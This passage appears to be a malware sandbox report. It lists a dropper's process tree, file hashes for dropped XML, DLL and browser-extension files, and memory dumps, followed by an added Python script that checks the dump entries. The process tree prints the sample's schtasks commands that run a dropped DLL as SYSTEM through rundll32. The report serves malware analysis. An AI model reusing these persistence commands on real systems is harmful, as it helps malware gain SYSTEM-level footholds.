    schtasks /CREATE /TN "gtjPvKPVMNaEWIYZSDJ2" /F /xml "C:\Program Files (x86)\LSPuJNxSevMsC\sAaRZSu.xml" /RU "SYSTEM"
    2⤵
    • System Location Discovery: System Language Discovery
    • Scheduled Task/Job: Scheduled Task
    PID:5068
  • C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "ALUoYMkKWcUKdiGlz" /SC once /ST 13:09:50 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\VemQCkOhwRjHyFqD\dUCxVsvc\CslOOOS.dll\",#1 /kdidNu 525403" /V1 /F
    2⤵
    • Drops file in Windows directory
    • Scheduled Task/Job: Scheduled Task
    PID:4184
  • C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "ALUoYMkKWcUKdiGlz"
    2⤵
    • System Location Discovery: System Language Discovery
    PID:164
  • C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "mmcKQTFpdsyEWxyLI"
    2⤵
    PID:1268
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3280 -s 2168
    2⤵
    • Program crash
    PID:3100
• \??\c:\windows\system32\rundll32.EXE
  c:\windows\system32\rundll32.EXE "C:\Windows\Temp\VemQCkOhwRjHyFqD\dUCxVsvc\CslOOOS.dll",#1 /kdidNu 525403
  1⤵
  PID:2296
  • C:\Windows\SysWOW64\rundll32.exe
    c:\windows\system32\rundll32.EXE "C:\Windows\Temp\VemQCkOhwRjHyFqD\dUCxVsvc\CslOOOS.dll",#1 /kdidNu 525403
    2⤵
    • Blocklisted process makes network request
    • Checks BIOS information in registry
    • Loads dropped DLL
    • Drops file in System32 directory
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • Modifies data under HKEY_USERS
    PID:4220
    • C:\Windows\SysWOW64\schtasks.exe
      schtasks /DELETE /F /TN "ALUoYMkKWcUKdiGlz"
      3⤵
      PID:3668

Network

MITRE ATT&CK Enterprise v15

Downloads

• C:\$RECYCLE.BIN\S-1-5-18\desktop.ini
  Filesize  129B
  MD5       a526b9e7c716b3489d8cc062fbce4005
  SHA1      2df502a944ff721241be20a9e449d2acd07e0312
  SHA256    e1b9ce9b57957b1a0607a72a057d6b7a9b34ea60f3f8aa8f38a3af979bd23066
  SHA512    d83d4c656c96c3d1809ad06ce78fa09a77781461c99109e4b81d1a186fc533a7e72d65a4cb7edf689eeccda8f687a13d3276f1111a1e72f7c3cd92a49bce0f88

• C:\Program Files (x86)\AfQFmMtUU\sZmuuuz.xml
  Filesize  2KB
  MD5       26fcd8dbfd6f105036d0ff5102007ae4
  SHA1      501f4e0d342d46e142cbb474129fadd80d0e3d97
  SHA256    5761579667c3afba4b9fa61077523953a11a966410e1f00945f43df0103b5400
  SHA512    05f1800f098ed879c1dee43c1b4d82563107b2458d95d5cf38d945b7914bd5b8a2dc7c4b1d2f9cf7c228035aa576364c5e17d1d87766de28b71b06ba066fc114

• C:\Program Files (x86)\LSPuJNxSevMsC\sAaRZSu.xml
  Filesize  2KB
  MD5       4b8ac89797e8bacb8bb60d1f188aab23
  SHA1      9b6f0a469ee2fb395558fd1e01e9c85febf5d06c
  SHA256    0afe62e69a9f6e867b2134e3e2ea8fe5214fae1bb214a449c71293affb452bab
  SHA512    7af8ad8f91df087bd67eb9ace39c2b50f1c7e5065db48decb714a9df36356708ae91804715151af63debc7a75b2339ac2a100946766ca8144f5073cd4f76d66a

• C:\Program Files (x86)\XTIErcVviYlSEsscsXR\pnzWIiw.xml
  Filesize  2KB
  MD5       eae627c567e0eba8fc4ed8c2090bfe0b
  SHA1      a0171038f32bbf4ba322c1fefcb5384843025b70
  SHA256    3ca36f39bb9726db3bb803f44fbdd5ff13ef151402136989e3dde0d115584b35
  SHA512    9ae3ac5baf18995de4c68b74b125f25384b5d3f2ff497ddc705f51dc82ef824e9cb5ac7d35556e8107f52af969373640b20b4793729c8b03a13b80ffc58e0837

• C:\Program Files (x86)\enDWjyqEZhNU2\PwbYhRs.xml
  Filesize  2KB
  MD5       d3c3942a07d2fa88f6530cd687ee2189
  SHA1      32282837e227d4cfaaffc3ce1f2bd91aa6c67c6b
  SHA256    d7af126bb770e99242ea6f4bb825b9ffebff6e2b7bc9ab533e542c8075793f3d
  SHA512    5c92fb7f7e1d900ff88a9925252fba4543b1241d313ecdab0a2d5a3365eb2cdeb911f04cc3fe61c67a3f49f81eebae1eadc75cc105a6e4f1163defade91ea9c3

• C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi
  Filesize  2.0MB
  MD5       660ca2ad9b7f182372fb535f49c80a5b
  SHA1      2c213d9e1e99b905601c45b573ff246accf0d529
  SHA256    2dcc98de0ab207bc08b800ee15b60fda432e1b338e22e7a48f5c3415984c475f
  SHA512    8d2297216d36935f5151cf1f035504752d3e4e753a974cf714f5ce82c0eb1c3cb247c6701e91cc27319666cf417d4cd71cbaaae7253de8ff5ae326f14def5bb6

• C:\ProgramData\qDoHUGiKOnuwyvVB\ptXituU.xml
  Filesize  2KB
  MD5       ee673dc34bdf54196016f240a1cbd74e
  SHA1      8375d0a174b770bfbb3d79cd2a404a0fb6ed6fa5
  SHA256    6627ca83d397f49a146d5b7b50aea35d799f76911149b0940b51f0ebb2badbe8
  SHA512    bf0ddb667d6669cb296b561c7f8df967bc5c7d7dda49c52da920ca19d970f34ea4e33062c9345e11cdcc3cac0ab657eb45314ed98c24884fd8f78df5bac5141d

• C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json
  Filesize  187B
  MD5       2a1e12a4811892d95962998e184399d8
  SHA1      55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
  SHA256    32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
  SHA512    bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

• C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json
  Filesize  136B

                                                                                                          MD5

                                                                                                          238d2612f510ea51d0d3eaa09e7136b1

                                                                                                          SHA1

                                                                                                          0953540c6c2fd928dd03b38c43f6e8541e1a0328

                                                                                                          SHA256

                                                                                                          801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

                                                                                                          SHA512

                                                                                                          2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json

                                                                                                          Filesize

                                                                                                          150B

                                                                                                          MD5

                                                                                                          0b1cf3deab325f8987f2ee31c6afc8ea

                                                                                                          SHA1

                                                                                                          6a51537cef82143d3d768759b21598542d683904

                                                                                                          SHA256

                                                                                                          0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

                                                                                                          SHA512

                                                                                                          5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                          Filesize

                                                                                                          10KB

                                                                                                          MD5

                                                                                                          0edd6f46326a47d468e5749a8251ded0

                                                                                                          SHA1

                                                                                                          17984ee5b4fbfefb55fc3ab58eba20afb0bbc934

                                                                                                          SHA256

                                                                                                          2f40062d75cece99df5d8c1e3ed7de19282f6299c6a830e8265981f738716b9a

                                                                                                          SHA512

                                                                                                          f50348cb51f28949396dd11c6ed5f693b8d97b2030e9643361b4bb2f0c46b6d10240027df5962d37ef599ab3623a47fb1541fd7ed9ceb9cf7b0864f62e85b7a7

                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

                                                                                                          Filesize

                                                                                                          30KB

                                                                                                          MD5

                                                                                                          00b80de98e654b78fe4d0bf0d4b62c7b

                                                                                                          SHA1

                                                                                                          1db993a2248cb1c5ba350096ac2d9ee14888c3f6

                                                                                                          SHA256

                                                                                                          be54dcf5fed1236a044e63f68c930560ef6fbf42c991e6ef5ec9c617d3c34a2b

                                                                                                          SHA512

                                                                                                          4e56daf21df65b9fc47d51a9408e29dbab890665d55e9adaa48c64b01ad02cc10c627d41e4688768530d9d513721935cc3ee4456819c322e6931873f8300c9cd

                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                                                                          Filesize

                                                                                                          2KB

                                                                                                          MD5

                                                                                                          6bf0e5945fb9da68e1b03bdaed5f6f8d

                                                                                                          SHA1

                                                                                                          eed3802c8e4abe3b327c100c99c53d3bbcf8a33d

                                                                                                          SHA256

                                                                                                          dda58fd16fee83a65c05936b1a070187f2c360024650ecaf857c5e060a6a55f1

                                                                                                          SHA512

                                                                                                          977a393fdad2b162aa42194ddad6ec8bcab24f81980ff01b1c22c4d59ac268bb5ce947105c968de1a8a66b35023280a1e7709dfea5053385f87141389ebecb25

                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                          Filesize

                                                                                                          12KB

                                                                                                          MD5

                                                                                                          acb8c1f251887b017a3e319dfcfad6ce

                                                                                                          SHA1

                                                                                                          93e4f65af5f271d979be7d0ff0dd60d8a421eba0

                                                                                                          SHA256

                                                                                                          8c1bc05dafa8e41facf1899a37dd98ef3a265d0cd6213c9e99cccb497c667ef7

                                                                                                          SHA512

                                                                                                          376e3da3428ea66ced2de12967335a92a47232e5a6dd5e916b4d6adccfe6187c6029ba3d97b3c74b7b67f9f92938cfd3d6579f764b23b8888d50832aedf0a2e8

                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                          Filesize

                                                                                                          15KB

                                                                                                          MD5

                                                                                                          e4a9411541b050bf40dcd9ad2c824d74

                                                                                                          SHA1

                                                                                                          ad48c3463d116f0391028ea1d57ae708cf7a666f

                                                                                                          SHA256

                                                                                                          9dd0de4457fe97884d4c6d58ff4e89f47dc42c9f1dd2ec897d49626cf5e7457e

                                                                                                          SHA512

                                                                                                          749bb035a29980ff0d853fd73b29702f6d01fe7bcf10576a0dbf8504d79e176b4336ce29804d018cb6cf85a8824e754150454631688d3e7f39e7923d1a09af2c

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS6987.tmp\Install.exe

                                                                                                          Filesize

                                                                                                          6.4MB

                                                                                                          MD5

                                                                                                          7dc92fb0b434bf188a0dca6c53a0a1a7

                                                                                                          SHA1

                                                                                                          dcdf08775b67d921d8177ac73cefc0435e7c955a

                                                                                                          SHA256

                                                                                                          a5e40c8b2d7ed773517aff0d08592d22659acd8e557a3c45418e384ada72e8a5

                                                                                                          SHA512

                                                                                                          370afc9152dfe41eddd7b3974684815c9d983d7d508a855a72558078dabecd13a4a9e3edb625c7221c51ea8e689bce0997ddf50b41517552df3959f7c1b7f1a7

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install.exe

                                                                                                          Filesize

                                                                                                          6.7MB

                                                                                                          MD5

                                                                                                          edd50592ab69b499f7fd1fad1659baa1

                                                                                                          SHA1

                                                                                                          882b2eb1a12a1bd2a516d0f3f8500036abd3b25c

                                                                                                          SHA256

                                                                                                          92f5569ad1c4d84cc12cb7068c4a2929f1ad0ee8bf7110a672a4d7932ccb67c2

                                                                                                          SHA512

                                                                                                          f1a5401e0ed875e96ec6719abab973061953f6058360def9fa38d6fa07f68abdb7c96c88858d1b8200553a1e930d933fd27bc8c00d8ec6cba18b9bbecf08038e

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3ofgno0a.fvt.ps1

                                                                                                          Filesize

                                                                                                          1B

                                                                                                          MD5

                                                                                                          c4ca4238a0b923820dcc509a6f75849b

                                                                                                          SHA1

                                                                                                          356a192b7913b04c54574d18c28d46e6395428ab

                                                                                                          SHA256

                                                                                                          6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

                                                                                                          SHA512

                                                                                                          4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

                                                                                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6lk2b5bo.default-release\prefs.js

                                                                                                          Filesize

                                                                                                          6KB

                                                                                                          MD5

                                                                                                          257c2ff7a733d5dab3cf78cba7304f8f

                                                                                                          SHA1

                                                                                                          6f958a32e9183c174b5b6171829c99c1ab3abe04

                                                                                                          SHA256

                                                                                                          63d0ff8029c9b92ab7c66f0ec317349b0fbbf6e9c8cdfb4d09d56a916ea1492a

                                                                                                          SHA512

                                                                                                          dfb5e4218bbcc3cec5f0f12bc1acd09a94691c9cb6897fc1558ec86fb3ab5abfe058b8cdccc0a4cb33fefecc964e1ce49f0352c6f99ff476da9b6a0b4b72ba3b

                                                                                                        • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                          Filesize

                                                                                                          15KB

                                                                                                          MD5

                                                                                                          92bcc9f6f2c00fc126de0b597a563d70

                                                                                                          SHA1

                                                                                                          ccdb746d2d12b3c8410ad9a555598f6fcca144c0

                                                                                                          SHA256

                                                                                                          4583c87b8b8cff131fa0ec9ad0ad3b6601b356238a2d868237ed821c20b99cbf

                                                                                                          SHA512

                                                                                                          3102b22e2bf0763aafe5f873959aed1bb85b72d34fcec86542ee40124459eb777797e8a9a45ba7111f18f513b5f619f2128786ea202e32335e03155dd19608b8

                                                                                                        • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                          Filesize

                                                                                                          12KB

                                                                                                          MD5

                                                                                                          aa240d9f40db8c5b4341867189986e04

                                                                                                          SHA1

                                                                                                          864140689c54fabaa7907e93819716e1bb41c3c0

                                                                                                          SHA256

                                                                                                          0222b28a3fe0147a9c2c717688215a657a75ad5b17748cf5b5958c63b389e38f

                                                                                                          SHA512

                                                                                                          bb0a398ad4857e94b8ebc95aac6cf24e8b077278eee2cf2c56d05ef3cf8dfe384a184ec2e7c620546b87e517e45dccf81c67d3167b187a990a38ef728f7889d2

                                                                                                        • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                          Filesize

                                                                                                          12KB

                                                                                                          MD5

                                                                                                          7da0d7daa214c8e94e6c94b3525b59bd

                                                                                                          SHA1

                                                                                                          c34c94f6ff9e8177c8effa000c16133f36e35a2a

                                                                                                          SHA256

                                                                                                          14daa0de18faedd82815123235e40f31d068bea90ae7226a0209ef7e71f49f4c

                                                                                                          SHA512

                                                                                                          070370af65e21369e5d9203cfb9503580741d0ee43d8bb9fc16bad3b2727db268e5ae6f179ddc4595915f62bc53b8590ca567b14072ac34544125fcf803de192

                                                                                                        • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                          Filesize

                                                                                                          15KB

                                                                                                          MD5

                                                                                                          2af817ffa7aee263294f75e0d67a4b65

                                                                                                          SHA1

                                                                                                          41dd9b43700ea17ff52ff32633e1f68e47802468

                                                                                                          SHA256

                                                                                                          4932563ce35f2aeff5a00d394eb68fc60a2a8e4f017ea6b0f7e19c2721450d27

                                                                                                          SHA512

                                                                                                          e01f6e41e896b2dbb5989f10a8f9e55abfc5bc5fa3c1af64ecc82f821ef592966415a76b4e5b64bf980ea09bcf764b39332c2b3c0ecaad6d3339ad508618255c

                                                                                                        • C:\Windows\Temp\VemQCkOhwRjHyFqD\dUCxVsvc\CslOOOS.dll

                                                                                                          Filesize

                                                                                                          6.4MB

                                                                                                          MD5

                                                                                                          036ff06d77a51bfb4d5b0368c1c96760

                                                                                                          SHA1

                                                                                                          82f349bf706dc4be88b9ff67e67017cc03a11581

                                                                                                          SHA256

                                                                                                          1c124bea82a19344a28de791cdc5ce0ecbe8553c947c91e6c75e9aa52cc1eb7c

                                                                                                          SHA512

                                                                                                          5c21aecf14e3384b256a13388e45dbce359dd9cdab6bf564befb3f08fd217ffb78b85235997528763742acef96bdf727f8a207877cc95a531dd73e91495c8efb

                                                                                                        • C:\Windows\system32\GroupPolicy\Machine\Registry.pol

                                                                                                          Filesize

                                                                                                          6KB

                                                                                                          MD5

                                                                                                          d34dd5ac4d5069bbcb9fbfb23c2ea07b

                                                                                                          SHA1

                                                                                                          6ce50f82885f82271a403e9077d48b5a23b17921

                                                                                                          SHA256

                                                                                                          066c916436530d917f7e62828567e2d00fcdf53e5a1203ae3003bbe62a169969

                                                                                                          SHA512

                                                                                                          fda0b8675275bfbd3e6184eaf6df00c663181b32eab0472180bb935b8f72277e0a3665a5f2260f77d11fc16b3b006d081ab97ad027f9614834b10d9ebd9495bb

                                                                                                        • memory/512-141-0x0000025EF0E70000-0x0000025EF0E92000-memory.dmp

                                                                                                          Filesize

                                                                                                          136KB

                                                                                                        • memory/512-145-0x0000025EF1190000-0x0000025EF1206000-memory.dmp

                                                                                                          Filesize

                                                                                                          472KB

                                                                                                        • memory/828-56-0x0000000007960000-0x0000000007CB0000-memory.dmp

                                                                                                          Filesize

                                                                                                          3.3MB

                                                                                                        • memory/828-58-0x0000000007FF0000-0x000000000803B000-memory.dmp

                                                                                                          Filesize

                                                                                                          300KB

                                                                                                        • memory/2296-225-0x0000000006DB0000-0x0000000006DFB000-memory.dmp

  (Filesize 300KB)
• memory/2296-213-0x00000000068F0000-0x0000000006C40000-memory.dmp (Filesize 3.3MB)
• memory/3280-270-0x0000000002D40000-0x0000000002DA5000-memory.dmp (Filesize 404KB)
• memory/3280-487-0x0000000000320000-0x00000000009D4000-memory.dmp (Filesize 6.7MB)
• memory/3280-458-0x0000000003980000-0x0000000003A06000-memory.dmp (Filesize 536KB)
• memory/3280-468-0x0000000003AF0000-0x0000000003BC7000-memory.dmp (Filesize 860KB)
• memory/3280-199-0x0000000010000000-0x00000000105DD000-memory.dmp (Filesize 5.9MB)
• memory/3280-214-0x00000000026C0000-0x0000000002745000-memory.dmp (Filesize 532KB)
• memory/3280-174-0x0000000000320000-0x00000000009D4000-memory.dmp (Filesize 6.7MB)
• memory/4012-74-0x0000000001350000-0x0000000001A04000-memory.dmp (Filesize 6.7MB)
• memory/4012-101-0x0000000010000000-0x00000000105DD000-memory.dmp (Filesize 5.9MB)
• memory/4012-175-0x0000000001350000-0x0000000001A04000-memory.dmp (Filesize 6.7MB)
• memory/4120-49-0x0000000010000000-0x00000000105DD000-memory.dmp (Filesize 5.9MB)
• memory/4120-12-0x0000000001350000-0x0000000001A04000-memory.dmp (Filesize 6.7MB)
• memory/4120-73-0x0000000001350000-0x0000000001A04000-memory.dmp (Filesize 6.7MB)
• memory/4220-454-0x0000000003F20000-0x00000000044FD000-memory.dmp (Filesize 5.9MB)
• memory/4308-78-0x0000000007790000-0x00000000077DB000-memory.dmp (Filesize 300KB)
• memory/4308-77-0x0000000006D40000-0x0000000007090000-memory.dmp (Filesize 3.3MB)
• memory/4568-17-0x0000000007E40000-0x0000000007E62000-memory.dmp (Filesize 136KB)
• memory/4568-21-0x0000000007FB0000-0x0000000007FCC000-memory.dmp (Filesize 112KB)
• memory/4568-20-0x00000000081F0000-0x0000000008540000-memory.dmp (Filesize 3.3MB)
• memory/4568-19-0x0000000008130000-0x0000000008196000-memory.dmp (Filesize 408KB)
• memory/4568-18-0x0000000007EE0000-0x0000000007F46000-memory.dmp (Filesize 408KB)
• memory/4568-23-0x0000000008890000-0x0000000008906000-memory.dmp (Filesize 472KB)
• memory/4568-38-0x0000000009A00000-0x0000000009A94000-memory.dmp (Filesize 592KB)
• memory/4568-16-0x0000000007810000-0x0000000007E38000-memory.dmp (Filesize 6.2MB)
• memory/4568-39-0x00000000096A0000-0x00000000096BA000-memory.dmp (Filesize 104KB)
• memory/4568-40-0x0000000009710000-0x0000000009732000-memory.dmp (Filesize 136KB)
• memory/4568-15-0x0000000007100000-0x0000000007136000-memory.dmp (Filesize 216KB)
• memory/4568-41-0x0000000009FA0000-0x000000000A49E000-memory.dmp (Filesize 5.0MB)
• memory/4568-22-0x0000000008B40000-0x0000000008B8B000-memory.dmp (Filesize 300KB)
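The dump names in this list follow a memory/PID-SEQ-0xSTART-0xEND-memory.dmp pattern, and the listed Filesize should agree with END minus START once display rounding is allowed for. The Python below is an added example, not part of the tria.ge report or its tooling: it parses a handful of entries copied from this list (plus one constructed, deliberately inconsistent entry under PID 9999), flags any whose listed size cannot be explained by rounding or by a dump that is one page short, and groups identical address ranges that were dumped from more than one process. The field layout is read off the file names themselves; the tolerance rule, the helper names and the sample list are assumptions for illustration.

```python
import re
from collections import defaultdict

PAGE = 0x1000  # x86/x64 page size; every range in the report is page-aligned

# Constructed sample: dump names and listed sizes copied from this report's
# memory-dump list, plus one deliberately inconsistent entry (PID 9999, a
# constructed value) so the size check has something to flag.
SAMPLE = [
    ("memory/2296-213-0x00000000068F0000-0x0000000006C40000-memory.dmp", "3.3MB"),
    ("memory/3280-270-0x0000000002D40000-0x0000000002DA5000-memory.dmp", "404KB"),
    ("memory/3280-199-0x0000000010000000-0x00000000105DD000-memory.dmp", "5.9MB"),
    ("memory/3280-214-0x00000000026C0000-0x0000000002745000-memory.dmp", "532KB"),
    ("memory/4012-74-0x0000000001350000-0x0000000001A04000-memory.dmp", "6.7MB"),
    ("memory/4012-101-0x0000000010000000-0x00000000105DD000-memory.dmp", "5.9MB"),
    ("memory/4120-12-0x0000000001350000-0x0000000001A04000-memory.dmp", "6.7MB"),
    ("memory/4120-49-0x0000000010000000-0x00000000105DD000-memory.dmp", "5.9MB"),
    ("memory/4568-15-0x0000000007100000-0x0000000007136000-memory.dmp", "216KB"),
    ("memory/9999-1-0x0000000000400000-0x0000000000401000-memory.dmp", "5.9MB"),
]

NAME_RE = re.compile(
    r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]{16})-0x([0-9A-Fa-f]{16})-memory\.dmp$")
SIZE_RE = re.compile(r"^(\d+(?:\.\d+)?)(KB|MB)$")


def parse_dump_name(name):
    """Split 'memory/PID-SEQ-0xSTART-0xEND-memory.dmp' into its fields.

    The PID-SEQ-START-END layout is an assumption read off the report's own
    file names; SEQ is treated as an opaque per-report ordinal.
    """
    m = NAME_RE.match(name)
    if not m:
        raise ValueError(f"unrecognised dump name: {name}")
    pid, seq, start, end = m.groups()
    start, end = int(start, 16), int(end, 16)
    if end <= start or start % PAGE or end % PAGE:
        raise ValueError(f"range is not a page-aligned, non-empty region: {name}")
    return {"pid": int(pid), "seq": int(seq), "start": start, "end": end,
            "length": end - start}


def parse_listed_size(text):
    """Return (bytes, resolution) for a displayed size such as '404KB' or '3.3MB'.

    resolution is the granularity of the display (1 KiB for KB values, 0.1 MiB
    for MB values) and bounds the rounding error hidden in the listed figure.
    """
    m = SIZE_RE.match(text)
    if not m:
        raise ValueError(f"unrecognised size: {text}")
    value, unit = float(m.group(1)), m.group(2)
    scale = 1024 if unit == "KB" else 1024 * 1024
    resolution = scale if unit == "KB" else scale // 10
    return int(round(value * scale)), resolution


def size_mismatches(entries):
    """Entries whose listed size is not explained by their address range.

    A listed figure is accepted if it lies within display rounding (half the
    resolution) plus one page of the range length, since a dump may be a page
    short of its mapped range. Anything further off is returned as
    (name, range_length, listed_bytes).
    """
    bad = []
    for name, listed in entries:
        region = parse_dump_name(name)
        listed_bytes, resolution = parse_listed_size(listed)
        tolerance = resolution // 2 + PAGE
        if abs(region["length"] - listed_bytes) > tolerance:
            bad.append((name, region["length"], listed_bytes))
    return bad


def shared_ranges(entries):
    """Map (start, end) -> sorted PIDs for ranges dumped from more than one process."""
    pids = defaultdict(set)
    for name, _ in entries:
        region = parse_dump_name(name)
        pids[(region["start"], region["end"])].add(region["pid"])
    return {rng: sorted(p) for rng, p in pids.items() if len(p) > 1}


if __name__ == "__main__":
    for name, length, listed in size_mismatches(SAMPLE):
        print(f"size mismatch: {name}: range is {length} bytes, listed {listed}")
    for (start, end), pids in sorted(shared_ranges(SAMPLE).items()):
        print(f"0x{start:08X}-0x{end:08X} dumped from PIDs {pids}")
```

On the entries copied from this report the size check passes for every real line, including 3280-214, whose 0x85000-byte range is listed as 532KB rather than 533KB and is absorbed by the one-page allowance; only the constructed PID 9999 entry is flagged. The grouping shows 0x10000000-0x105DD000 (5.9MB) recurring in PIDs 3280, 4012 and 4120, and 0x1350000-0x1A04000 (6.7MB) in 4012 and 4120. 0x10000000 is the linker's default image base for a DLL built without an explicit base, which sits naturally beside the report's "Loads dropped DLL" signature, although only the dumps themselves can confirm what the region holds. Keying the grouping on length instead of on the (start, end) pair would additionally pair PID 3280's 0x320000-0x9D4000 region with the 0x1350000 regions, since all are 0x6B4000 bytes long; same-sized images at different bases are what a relocated copy of one module looks like.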